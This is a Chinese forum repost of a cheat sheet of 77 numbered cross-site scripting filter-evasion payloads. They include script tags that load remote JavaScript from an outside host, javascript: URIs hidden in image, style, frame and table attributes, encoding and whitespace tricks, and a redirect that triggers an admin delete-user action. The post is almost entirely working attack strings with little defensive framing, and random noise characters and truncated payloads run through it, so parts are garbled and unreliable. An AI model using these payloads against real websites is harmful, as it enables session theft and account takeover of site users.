貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。! S% f9 B0 u U1 e$ \# Y
(1)普通的XSS JavaScript注入" |* ^' |$ }# b" R0 U
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" u/ o4 H% K: C. ~' w3 ?
(2)IMG标签XSS使用JavaScript命令
* y& T( z& s4 r# @6 {<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# z7 }. `, |' i, P( @- b(3)IMG标签无分号无引号
0 I2 _0 q7 K+ @ s7 x<IMG SRC=javascript:alert(‘XSS’)>
2 M4 ?; n( O! O& l3 _1 q(4)IMG标签大小写不敏感
% u f7 `) ?8 o5 y1 r t<IMG SRC=JaVaScRiPt:alert(‘XSS’)>; G: U7 Z. [" ^$ P& N( ?8 u: L
(5)HTML编码(必须有分号)2 A/ n- I: Z2 U7 K9 E
<IMG SRC=javascript:alert(“XSS”)>
8 e. K2 |3 r) c$ W2 n: N% V* U(6)修正缺陷IMG标签* O+ U. n: E9 C; i% C
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 o0 X. n6 I9 p1 e% C/ P+ n3 O
k7 x" u& q" q7 `4 n: D9 M# \
! i, I: X7 w9 Q7 N(7)formCharCode标签(计算器)
) Y! i( E2 M3 n D5 z! ~<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>+ i! d7 J/ m& ] E
(8)UTF-8的Unicode编码(计算器)9 i6 D, d0 L0 `7 Z$ n
<IMG SRC=jav..省略..S')>. {7 {9 ^3 z. J7 e: F8 ~
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)5 K7 v( e6 V: v2 X' i7 U
<IMG SRC=jav..省略..S')>: h4 w5 q1 H4 r: m8 J- X
(10)十六进制编码也是没有分号(计算器), p# w9 Q" k; m% B
<IMG SRC=java..省略..XSS')>
0 r% R0 h9 q6 B$ H2 C2 \3 P7 o(11)嵌入式标签,将Javascript分开 ~$ H5 I m1 i' f; V; N, s) G8 G
<IMG SRC=”jav ascript:alert(‘XSS’);”>% |0 }* p3 S' |
(12)嵌入式编码标签,将Javascript分开
& E% [) @! m3 [$ C% Y<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 f! \: L# X z(13)嵌入式换行符
* x. ^ Z4 u1 E$ N* m& ` o<IMG SRC=”jav ascript:alert(‘XSS’);”>
) P8 i# V* W1 b* ~9 U- ?$ Y2 O6 y, z9 c(14)嵌入式回车5 b& v; G/ I% ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 V0 g) o3 H1 |9 s: ], z
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 n' e. w, U1 C<IMG SRC=”javascript:alert(‘XSS‘)”>" l4 P% a! w% r2 A i
(16)解决限制字符(要求同页面)
4 W* w7 J3 {' y; j% I; Z<script>z=’document.’</script>6 Y7 T+ }# V$ D- P6 a
<script>z=z+’write(“‘</script>3 U* X2 X. X1 l: U
<script>z=z+’<script’</script>
. |" V( V; g: V) o: z% E<script>z=z+’ src=ht’</script>4 K1 p7 `5 O2 T g {! _$ | [6 D
<script>z=z+’tp://ww’</script>
5 l+ F) ]" U1 B& _8 ]<script>z=z+’w.shell’</script>
9 F' O& V' s, W<script>z=z+’.net/1.’</script>
! e O, N% [ P: Z, ]2 d+ `- H8 Q<script>z=z+’js></sc’</script>
, l- p( d: l$ K1 _: R6 u<script>z=z+’ript>”)’</script>! b- \! K( y* F7 ^
<script>eval_r(z)</script>- P. v+ I) |$ t5 W& Q
(17)空字符12-7-1 T00LS - Powered by Discuz! Board1 L5 S+ W' V9 C, p2 x
https://www.t00ls.net/viewthread ... table&tid=15267 2/6) ]/ X' ]) R% V4 q4 T8 `! O4 i4 S! g
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 h$ v7 ~% w0 L2 M5 j; Z, ? R& V(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
4 K& ^6 ?3 \5 [+ x7 dperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out, x( B: V& h* ~' ~! l' U( B2 y
(19)Spaces和meta前的IMG标签7 J' h1 e; s0 @4 z4 P6 |
<IMG SRC=” javascript:alert(‘XSS’);”>7 C; S8 q1 T9 v6 y# a# y3 [, B
(20)Non-alpha-non-digit XSS
$ v" v& }+ H" @* k# m$ S+ Y<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
9 u6 F1 b/ y m( Y; K4 ^, E$ o8 ? o(21)Non-alpha-non-digit XSS to 2
2 s1 P1 O2 i. ~<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>( ]+ j# r/ \# ^& h. a d, g
(22)Non-alpha-non-digit XSS to 3
' P- i% G6 }7 i/ N<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
: A( h3 N+ K& Z+ T(23)双开括号
& P! T9 P2 X' D& G<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# K( X# `6 C3 V- R(24)无结束脚本标记(仅火狐等浏览器)! A3 L3 l ^; ^' @+ M
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
2 S& I1 J2 o9 y(25)无结束脚本标记2* t* y- D# ~/ M: X- t: I1 Q
<SCRIPT SRC=//3w.org/XSS/xss.js>
7 k/ Y+ u- S# b* d. R5 j(26)半开的HTML/JavaScript XSS0 e0 `: K& {* l( F, L5 r, S8 ]
<IMG SRC=”javascript:alert(‘XSS’)”
# A: O" ~/ t6 N/ \9 f' W$ I$ X(27)双开角括号0 p9 r' H8 P0 v- j: k. ^) e7 Y
<iframe src=http://3w.org/XSS.html <
2 A2 I0 m# I( D' j) B3 I(28)无单引号 双引号 分号. K0 c% e+ D9 l9 a( a$ y
<SCRIPT>a=/XSS/
5 }% `7 r# `3 z- J S7 {6 F7 Qalert(a.source)</SCRIPT>* P0 L% g: \9 C
(29)换码过滤的JavaScript
& G' ~9 o( E" ~\”;alert(‘XSS’);//# p8 {7 U2 l5 ]) ^
(30)结束Title标签+ b; e7 d, M5 k+ x% u! W+ U, m
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT> }2 d( G/ s: w1 Q
(31)Input Image. S. ?3 y$ Y- z$ E
<INPUT SRC=”javascript:alert(‘XSS’);”>
) v2 \$ S0 H, j+ n W6 I(32)BODY Image6 Z0 y# Q# I) ]6 r- [
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
3 j7 `# G9 p. F$ k+ `(33)BODY标签3 Q- {: h7 L% J0 v# l* p3 Z
<BODY(‘XSS’)>; _$ p b$ ]: j f# M6 q; y* c
(34)IMG Dynsrc. Y7 o& g7 L3 w( D6 n& y
<IMG DYNSRC=”javascript:alert(‘XSS’)”>+ T$ M! W/ d4 P) h; E
(35)IMG Lowsrc& T- d6 D7 k! Z9 B
<IMG LOWSRC=”javascript:alert(‘XSS’)”>3 l0 g8 O' @# _. \ @( X* B1 M
(36)BGSOUND
6 a- V* j$ t; K<BGSOUND SRC=”javascript:alert(‘XSS’);”>
, a. o5 l, Y* M(37)STYLE sheet2 z8 _, ?/ i3 u% N: ?
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
" `* E5 P) J9 i1 k) u(38)远程样式表
* V- ~/ w2 Q- L+ C1 C9 v1 ^<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>. ]$ v+ ], O- e( M
(39)List-style-image(列表式)
- T. C2 a, h) I c<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS7 h' F( a9 n {; v8 Z! z* e# s
(40)IMG VBscript
7 e% X2 N, p+ [, l) q% \<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS. w9 O$ x& r' J! N8 Z) |' j5 P2 M$ G9 [
(41)META链接url- Q8 t8 t4 O# N6 P
& K/ u- P2 d+ f8 S( K! i9 W
& [5 O! \5 J& S5 f- `& F7 C<META HTTP-EQUIV=”refresh” CONTENT=”0;- h" V8 |( C2 b }/ i
URL=http://;URL=javascript:alert(‘XSS’);”>
: ]5 j! T' i1 ?1 ^ K(42)Iframe$ {; h9 ^8 d0 k' L
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
) P2 u, `& w& G1 H0 |# \) E(43)Frame. x+ Z2 b+ @5 _! n; e. n0 I
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board. e1 s2 f1 d0 r& L' P; ?
https://www.t00ls.net/viewthread ... table&tid=15267 3/67 a! k3 }0 _7 E# c5 f
(44)Table
( a. j6 j& F! F7 ^3 V! n<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> G5 r- u1 \( G) a2 a1 K' y
(45)TD
/ t+ e2 _6 i2 C! g& D! {& B<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>, H* P+ I/ X) W! g8 a
(46)DIV background-image
! J' N# a) q" Y; T5 ?5 Z" Y: g6 t<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>8 h2 f! X' w; M' Z& ~
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
: R: m4 d$ n! A8&13&12288&65279)
4 \5 L* R; f9 Q0 c _' ^<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( _% v3 p1 K d0 X3 m* F(48)DIV expression3 W2 K, o4 E0 ?: h m
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>* _. ^& v+ E" y8 R! ]
(49)STYLE属性分拆表达
; P4 O( t. O4 k% g<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>5 q# u+ M* N$ I. v
(50)匿名STYLE(组成:开角号和一个字母开头) k8 l3 a9 u- Q4 l$ ~* T
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
* F, A+ J2 b$ L(51)STYLE background-image4 l/ R3 L3 ~1 ~) B* w. g v
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
. |$ |* @. _7 z, h9 r( Q/ Y# VCLASS=XSS></A>
1 l j" ]" V* `& A(52)IMG STYLE方式$ O7 ?$ U$ u! A5 b; X
exppression(alert(“XSS”))’>2 |) O: h" v7 N, @
(53)STYLE background" i" N$ K5 a* M. i: l
<STYLE><STYLE, ~ p- j8 L! a1 g
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>! Y" e- X9 E1 S' b: x" h
(54)BASE# L: ?$ }+ j+ v; c
<BASE HREF=”javascript:alert(‘XSS’);//”>! p0 x- s$ F p2 W6 x" `
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 [' Q R1 D4 c* ]: c* @+ ~ d<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>7 Z0 V9 i$ j' ^$ R3 C! _
(56)在flash中使用ActionScrpt可以混进你XSS的代码
6 c8 l6 A. Z( d. j2 K/ T( Ga=”get”;4 H; K- M( Z" ?8 g. H
b=”URL(\”";, Y" i7 X4 r7 B& F! q9 V
c=”javascript:”;4 D# i2 |( u! ]
d=”alert(‘XSS’);\”)”;
4 ^ V4 P' g3 _4 g! z) y) Veval_r(a+b+c+d);4 T1 @, r4 H$ w
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上* Z' E/ G5 k, `" ~, |3 u$ o
<HTML xmlns:xss>
( n. P( V5 q2 b( k0 ~; x: Z$ M9 Q<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>7 i+ U. Q- w% R" ?7 w# U
<xss:xss>XSS</xss:xss>
' _# {/ r1 D" E) q' }! i</HTML>
6 `1 v8 F( p% F7 n- T5 r" i(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
' [# v! w0 r4 g% ~<SCRIPT SRC=””></SCRIPT>
( ]& _/ U8 p' x. H5 A8 o(59)IMG嵌入式命令,可执行任意命令0 i$ X5 l' |, D3 Q5 m
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' m [. d; a% k6 b, a8 O(60)IMG嵌入式命令(a.jpg在同服务器)2 B* H/ y8 ]* n
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
) j& _2 q0 Y4 Z* P; q/ @* }(61)绕符号过滤5 D" A' v. N2 x& W" ~8 C4 {
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 u" Y: I V* G% W% C4 j! r. t
(62)
" f0 V" W3 m% h4 J<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. j" |7 d7 U( L(63)
4 _2 _- D' X T4 e5 l$ I<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 g& r' z8 m" s, ^, d' C5 S1 S
(64)
5 a6 L# _6 a' ]+ L: P" P5 F<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>& `' _9 [# y: s
(65)0 g# S" n& _# V$ Y6 D
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 T- v' k# H7 K, P2 d6 X% Y% ~7 b(66)12-7-1 T00LS - Powered by Discuz! Board
7 i B+ @2 l5 n/ J5 h( l8 D2 I: ^% ?https://www.t00ls.net/viewthread ... table&tid=15267 4/6; o/ g1 e8 m" L* w
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ o' b0 L( v/ p; O9 D(67)5 c; u) {& T& E3 X6 ~0 o
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>2 [; }$ T O/ O) j
</SCRIPT>0 O4 R; x% T% ]% X; }$ [ v# r
(68)URL绕行 T! x+ i' f4 @$ ]' |; ^* U( }
<A HREF=”http://127.0.0.1/”>XSS</A>
2 `* w' |& y5 d! E# N6 K(69)URL编码
% u: o9 D" o- C7 A& I2 M<A HREF=”http://3w.org”>XSS</A>
$ p% K+ |( v' D1 T2 \4 s$ b3 t(70)IP十进制7 w! P) w* K1 {4 y% N
<A HREF=”http://3232235521″>XSS</A>1 g* V3 `) z$ k! ]& a( f7 `, Q
(71)IP十六进制8 q5 D1 E. U* ~6 F/ e% \, s% `
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
3 v' t/ v0 s9 ~6 P) w1 s(72)IP八进制; M! c2 z0 x6 U# U5 H1 a) N
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
) X, @; f I# q e% Q( W, q' @9 p7 c(73)混合编码
# M9 K! [# T- p* {8 ^4 Q<A HREF=”h
8 [/ G% K5 ]$ t9 J' z/ q4 p$ K5 ]' mtt p://6 6.000146.0×7.147/”">XSS</A># P" I9 c7 I3 L. U! I3 s( [; l* C
(74)节省[http:]
3 a9 h# H; y$ H. A<A HREF=”//www.google.com/”>XSS</A>/ _ i* C% o$ C- g) r5 S* u
(75)节省[www]
/ q& r* W8 ]2 ~) h<A HREF=”http://google.com/”>XSS</A>
, I" c+ I, p5 C, F* O8 i(76)绝对点绝对DNS
& H* x/ \; r' {5 I<A HREF=”http://www.google.com./”>XSS</A>
( @/ {4 q* s, Q3 z- ?: T& T5 H(77)javascript链接
$ A2 O- T) J9 @/ H3 B: V$ l<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>9 P V5 O! E. `2 \: c3 v6 [
' w2 _7 H) y# d: ~% ?) _4 t. Y原文地址:http://fuzzexp.org/u/0day/?p=148 D# ], D- q- Q1 L2 w
+ n8 J* L9 }, r. r8 B0 O6 h7 _ |
发表于 2013-4-19 19:22:37
收藏
支持
反对